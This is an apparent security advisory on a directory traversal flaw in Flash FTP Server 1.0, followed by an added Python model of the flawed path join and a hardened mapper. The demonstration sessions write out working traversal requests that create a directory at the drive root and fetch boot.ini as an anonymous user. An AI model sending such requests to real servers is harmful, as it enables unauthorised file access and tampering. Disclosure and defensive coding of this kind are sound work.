Flash FTP Server 1.0 Directory Traversal

Release Date: January 1, 2004

Systems Affected:
Flash FTP Server 1.0 for Windows (note that the banner in the sessions below reads "v2.1"). The vendor describes it as a powerful, flexible, and easy-to-set-up FTP server for all Windows platforms.

Description:
The server does not canonicalize client-supplied paths before passing them to the filesystem. A path argument beginning with "/" followed by "../" sequences is not confined to the FTP root: the MKD reply below shows the configured root (C:\ftp_root) being dropped and the client's path appended directly to the drive letter, which Windows then resolves to the root of the drive. An anonymous user can therefore create directories and read files anywhere on the disk.

Demonstration:
--------------
[1] Creating a directory outside the FTP root:

220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.

[2] Reading a file outside the FTP root:

220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini

Suggestions:
Disable anonymous login and allow only trusted users access to the server.
Log creation of files and directories on the system to identify malicious users.

Patch: Not yet available

Credit: dr_insane
http://members.lycos.co.uk/r34ct/
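The following is an added example, not code from the advisory or from Flash FTP Server. It models the path handling that the MKD reply suggests (the client path joined onto the root with Windows semantics, so a leading "\" discards the root directory and keeps only the drive) and places it beside a hardened mapper that resolves the client path inside a virtual "/" namespace first and then verifies that the resulting real path is still under the root. The vulnerable_map function is an assumption about the server's behaviour inferred from the reply text; FTP_ROOT is taken from the PWD reply. ntpath is used so that Windows path semantics are reproduced on any host.

```python
"""Traversal model and hardened path mapper for an FTP server rooted on Windows.

vulnerable_map is an ASSUMED reconstruction of the flawed join, not the
product's code; it reproduces the reply 'C:\\..\\..\\owned' seen in the advisory.
"""
import ntpath
import posixpath

# Real directory behind the virtual root, as reported by the PWD reply.
FTP_ROOT = r"C:\ftp_root"


def vulnerable_map(root: str, client_path: str) -> str:
    """Assumed naive mapping: swap separators and hand root + path to the OS.

    ntpath.join treats a leading '\\' as drive-absolute, so the root's
    directory part is discarded and only the drive letter survives.
    """
    return ntpath.join(root, client_path.replace("/", "\\"))


def vulnerable_resolve(root: str, client_path: str) -> str:
    """Where the filesystem actually lands after collapsing the '..' segments."""
    return ntpath.normpath(vulnerable_map(root, client_path))


def safe_map(root: str, client_path: str) -> str:
    """Map a client path to a real path, refusing anything that leaves root.

    1. Canonicalise in a virtual POSIX namespace rooted at '/', where
       posixpath.normpath('/../../x') == '/x', so '..' cannot climb past '/'.
    2. Re-join the now-relative result under root with Windows semantics.
    3. Independently verify containment on the final OS-level path.
    """
    if "\x00" in client_path:
        raise ValueError("NUL byte in path")
    virtual = posixpath.normpath("/" + client_path.replace("\\", "/"))
    relative = virtual.lstrip("/").replace("/", "\\")
    # A drive specifier ('C:...') would make ntpath.join discard root entirely.
    if ntpath.splitdrive(relative)[0]:
        raise PermissionError(f"drive specifier in path: {client_path!r}")
    real = ntpath.normpath(ntpath.join(root, relative))
    root_norm = ntpath.normcase(ntpath.normpath(root))
    real_norm = ntpath.normcase(real)
    # Compare with a trailing separator so 'C:\ftp_root2' is not accepted.
    if real_norm != root_norm and not real_norm.startswith(root_norm + "\\"):
        raise PermissionError(f"path escapes root: {client_path!r} -> {real}")
    return real


def is_allowed(root: str, client_path: str) -> bool:
    """Convenience wrapper for the access decision alone."""
    try:
        safe_map(root, client_path)
    except (PermissionError, ValueError):
        return False
    return True


if __name__ == "__main__":
    # Constructed requests mirroring the two sessions in the advisory.
    for req in ("/../../../../../../../owned", "/../../../../../../../../boot.ini"):
        print(f"{req}")
        print(f"  naive join : {vulnerable_map(FTP_ROOT, req)}")
        print(f"  OS resolves: {vulnerable_resolve(FTP_ROOT, req)}")
        print(f"  hardened   : {safe_map(FTP_ROOT, req)}")
```

The hardened mapper never lets the operating system decide what ".." means relative to the real filesystem; it resolves the client's intent against the virtual root first, and the containment check at the end is a second, independent guard that also catches drive-letter and same-prefix tricks. Replacing a naive join with only a substring check on the raw client path (rejecting ".." literally) is a common weaker fix; it misses encoded or backslash variants and is not what this example does.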